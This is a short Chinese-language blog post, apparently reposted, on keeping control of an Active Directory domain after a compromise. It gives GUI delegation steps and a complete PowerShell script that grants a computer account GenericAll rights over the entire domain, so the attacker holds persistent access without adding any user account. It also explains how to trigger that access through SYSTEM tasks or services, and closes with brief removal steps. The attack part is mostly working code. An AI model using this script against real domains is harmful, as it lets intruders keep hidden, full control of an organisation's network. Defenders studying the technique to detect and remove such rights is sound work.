通过ACL维持域控权限
2021-10-20 13:33:14 Author: guage.cool(查看原文) 阅读量:10 收藏

发布于  更新于 

前置要求

  1. 已获得域管理权限
  2. 有一台域下的计算机SYSTEM权限

相较于其他维权方式的优点:

常见的方法都是围绕着用户、密码、票据来实现权限维持。

此方法不需要添加域账号,也就不用为密码过期、账号禁用、票据操作而头疼。

操作步骤

界面上操作

  1. 右键域->委派控制

  2. 添加->高级->对象类型->勾选计算机 找到有权限的计算机

  3. 创建自定义任务

  4. 默认值,下一步

  5. 选择完全控制

使用powershell修改

1
2
3
4
5
6
7
8
9
10
Import-Module ActiveDirectory
$ad = [ADSI]("LDAP://DC=zpyjjd,DC=com")
$computer = Get-ADComputer -Identity "WIN-N39A9OGCR8N"
$Identity = New-Object 'Security.Principal.SecurityIdentifier' $computer.SID.Value
$rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$type = [System.Security.AccessControl.AccessControlType]::Allow
$inherit = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$rights,$type,$inherit
$ad.ObjectSecurity.AddAccessRule($ace)
$ad.CommitChanges()

此时该计算机就具备整个域控的权限。

如何触发

  1. 可以通过计划任务,创建一个SYSTEM权限运行计划

  2. 也可以通过创建SYSTEM运行的服务来触发

如何删除

  1. 选择高级功能

  2. 右键域,选择属性。再选择安全,最后选择之前添加的计算机,点击删除


文章来源: https://guage.cool/windows-ad-persistent.html
如有侵权请联系:admin#unsafe.sh